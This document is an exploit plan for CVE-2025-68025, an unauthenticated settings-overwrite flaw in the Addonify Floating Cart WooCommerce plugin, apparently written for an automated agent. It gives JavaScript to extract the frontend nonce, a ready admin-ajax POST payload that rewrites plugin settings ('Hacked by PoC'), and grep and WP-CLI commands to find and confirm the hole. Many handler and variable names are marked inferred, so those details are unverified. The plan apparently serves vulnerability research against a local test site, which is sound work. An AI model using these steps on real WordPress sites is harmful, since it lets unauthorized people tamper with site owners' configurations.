Addonify Floating Cart For WooCommerce <= 1.2.17 - Missing Authorization

This research plan outlines the steps required to identify and exploit CVE-2025-68025, a Missing Authorization vulnerability in the Addonify Floating Cart For WooCommerce plugin.

1. Vulnerability Summary

The vulnerability exists because a specific AJAX handler or REST API endpoint in the addonify-floating-cart plugin fails to implement a capability check (e.g., current_user_can( 'manage_options' )). While the handler might implement a nonce check for CSRF protection, the nonce is often exposed to unauthenticated users on the frontend, allowing them to bypass the missing authorization check and perform actions intended only for administrators (such as modifying plugin settings or performing sensitive data operations).

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php (or potentially a REST route under /wp-json/addonify-floating-cart/v1/).
• Vulnerable Action: Likely addonify_fc_save_settings, afc_save_settings, or addonify_floating_cart_update_option (inferred).
• Parameter: Typically a settings array or individual option keys passed via POST.
• Authentication: None required (unauthenticated).
• Preconditions: The plugin must be active. A valid nonce must be obtained if the handler calls check_ajax_referer.

3. Code Flow Trace

1. Entry Point: The plugin registers an AJAX action for both authenticated and unauthenticated users:

   // Inferred registration in a class constructor or init hook
   add_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );
   add_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );
   

2. Vulnerable Function: The save_settings function (or similar) is called.
3. Missing Check:

   public function save_settings() {
       // May contain: check_ajax_referer( 'addonify_fc_nonce', 'nonce' );
       // MISSING: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }
       
       $settings = $_POST['settings'];
       update_option( 'addonify_floating_cart_settings', $settings );
       wp_send_json_success();
   }
   

4. Sink: The update_option function writes user-controlled data to the WordPress database.

4. Nonce Acquisition Strategy

The plugin likely localizes a nonce for its frontend "Floating Cart" functionality.

1. Identify Shortcode/Trigger: Check for add_shortcode or if the cart loads globally. The floating cart usually enqueues scripts on all frontend pages where WooCommerce is active.
2. Navigation: Use browser_navigate to go to the site's homepage.
3. Extraction: Based on common Addonify patterns, the nonce is likely stored in a global JS object.
   • Inferred JS Variable: addonify_floating_cart_params or afc_vars.
   • Inferred Key: ajax_nonce or nonce.
4. Execution:

   // Use browser_eval to find the nonce
   browser_eval("window.addonify_floating_cart_params?.ajax_nonce || window.afc_vars?.nonce")
   

5. Test Data Setup

1. Ensure WooCommerce and Addonify Floating Cart are installed and active.
2. Ensure a product exists so the cart functionality is triggered.
3. Create a public page to ensure the script (and nonce) is rendered:

   wp post create --post_type=page --post_status=publish --post_title="Cart Test" --post_content='[woocommerce_cart]'
   

6. Exploitation Strategy

We will attempt to change the plugin's configuration, specifically targeting a setting that would be visible in the admin UI or frontend (e.g., the cart title).

1. Capture Nonce: Use browser_navigate and browser_eval as described in Section 4.
2. Prepare Payload: Define a new value for a plugin setting.
   • Action: addonify_floating_cart_save_settings (inferred - must verify by grepping wp_ajax_nopriv in the source).
   • Target Option: addonify_floating_cart_settings.
3. HTTP Request (Playwright):

   {
     "method": "POST",
     "url": "http://localhost:8080/wp-admin/admin-ajax.php",
     "headers": {
       "Content-Type": "application/x-www-form-urlencoded"
     },
     "params": {
       "action": "addonify_floating_cart_save_settings",
       "nonce": "EXTRACTED_NONCE",
       "settings[cart_title]": "Hacked by PoC",
       "settings[enable_floating_cart]": "1"
     }
   }
   

7. Expected Results

• The server should return a 200 OK status with a JSON response: {"success":true}.
• The addonify_floating_cart_settings option in the database should be updated.

8. Verification Steps

After sending the HTTP request, verify the change using WP-CLI:

# Check the option value
wp option get addonify_floating_cart_settings --format=json

Verify that cart_title matches "Hacked by PoC".

9. Alternative Approaches

If the save_settings action name is different:

1. Grep Search:

   grep -rn "wp_ajax_nopriv_" wp-content/plugins/addonify-floating-cart/
   

2. Analyze Script Localization:
   Search for wp_localize_script to find the exact JS object name:

   grep -rn "wp_localize_script" wp-content/plugins/addonify-floating-cart/
   

3. REST API Check:
   If no AJAX actions are found, search for REST route registrations:

   grep -rn "register_rest_route" wp-content/plugins/addonify-floating-cart/
   

   Look for routes where 'permission_callback' => '__return_true' or no callback is defined.